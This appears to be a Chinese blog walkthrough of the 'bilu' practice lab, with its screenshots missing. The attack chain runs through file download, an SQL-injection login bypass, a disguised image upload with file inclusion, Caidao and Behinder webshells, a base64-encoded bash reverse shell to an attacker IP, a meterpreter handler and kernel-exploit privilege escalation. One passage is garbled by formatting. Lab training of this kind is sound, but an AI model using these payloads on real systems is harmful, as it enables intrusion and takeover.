bilu靶场渗透测试

bilu靶场渗透

信息采集:

扫描IP:

bilu靶场渗透测试_第1张图片

发现主机IP

扫描端口:

bilu靶场渗透测试_第2张图片

发现 22端口 80端口

扫描系统:

bilu靶场渗透测试_第3张图片

系统版本:Linux 3.2-3.9

namp漏扫:

bilu靶场渗透测试_第4张图片

过滤了一些xss、csrf漏洞,httponly没有设置,可以获取session。

中间件:apache 2.2.22/php

御剑扫描后台:

bilu靶场渗透测试_第5张图片

AWVS扫描:

bilu靶场渗透测试_第6张图片

Nessus扫描:

bilu靶场渗透测试_第7张图片

提示版本过低

web渗透:

任意文件下载:

http://192.168.80.138/test.php

存在任意文件下载,可以将黑盒变百盒(前提也是知道文件名)

bilu靶场渗透测试_第8张图片

下载test.php查看源码,发现存在file_exists()函数,如果存在面向对象可以利用。

bilu靶场渗透测试_第9张图片

文件上传:

猜测是可以任意文件上传

bilu靶场渗透测试_第10张图片

配合文件下载查看源码,发现好像上传什么都没有影响。

bilu靶场渗透测试_第11张图片

数据库信息暴露:

通过任意文件下载可以将后台扫出的都下载出来查看源代码。

c.php

bilu靶场渗透测试_第12张图片

show.php

bilu靶场渗透测试_第13张图片

分析代码,如果POST参数存在就输出users表中的数据。

bilu靶场渗透测试_第14张图片

数据库连接用户名:billu

连接密码:b0x_billu

数据库名称:ica_lab

index.php

下载查看源代码可得查询语句

bilu靶场渗透测试_第15张图片

将单引号设为空了,思考怎么绕过登录成功

用户名: or 1=1#admin

密码:admin \

可以直接登录成功

文件包含:

panel.php

bilu靶场渗透测试_第16张图片

getcwd()函数是返回当前路径,想要利用就需要利用到最后一个if,所以 c h o i c e ! = ( a d d ∣ ∣ s h o w ) , choice!=(add||show), choice!=(add∣∣show),_POST[‘load’]是利用的文件。

文件上传:

panel.php

bilu靶场渗透测试_第17张图片

设置了白名单对文件类型进行了判断,只能上传图片码,修改幻术插入GIF89a。

得到文件路径。

bilu靶场渗透测试_第18张图片

文件利用

在panel.php页面利用

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-peABz7Ij-1666595178192)(C:\Users\hp\AppData\Roaming\Typora\typora-user-images\image-20221023220036481.png)]

现在只需要修改参数即可,就可以实现任意php代码执行。

反弹shell:

一、直接执行系统命令,反向连接

continue=111&load=uploaded_images/888.gif&code=system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg | base64 -d | bash");
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg | base64 -d | bash
#bash -i >& /dev/tcp/192.168.80.129/4444 0>&1   =》YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg 反向连接的shell进行base64转码
#base64 -d  进行解码
#bash 指定运行环境

bilu靶场渗透测试_第19张图片

二、通过php来写一个php正向连接

continue=11&load=uploaded_images/888.gif&code=file_put_contents('uploaded_images/shell.php', '

bilu靶场渗透测试_第20张图片

使用菜刀连接

bilu靶场渗透测试_第21张图片

植入冰蝎shell

bilu靶场渗透测试_第22张图片

在冰蝎上执行反弹shell

bilu靶场渗透测试_第23张图片

或者直接反向连接metepreter

在msfconsole中使用exploit模块
set payload php/meterpreter/reverse_tcp  设置payload为php的代码
use exploit/multi/handler
设置远程主机就好,配合冰蝎反向连接

bilu靶场渗透测试_第24张图片

提权

查看系统信息和用户信息

bilu靶场渗透测试_第25张图片

使用shell连接

python -c 'import pty; pty.spawn("/bin/bash")'
创建一个终端
C语言版本:gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
python版本:Python 2.7.3 (default, Feb 27 2014, 20:00:17) 

获取内核版本

uname -srm
Linux 3.13.0-32-generic i686

搜索内核可用脏牛的漏洞

searchspliot -t 3.13

image-20221023231458242

尝试33824失败,尝试37292成功

bilu靶场渗透测试_第26张图片

你可能感兴趣的:(安全,php,linux)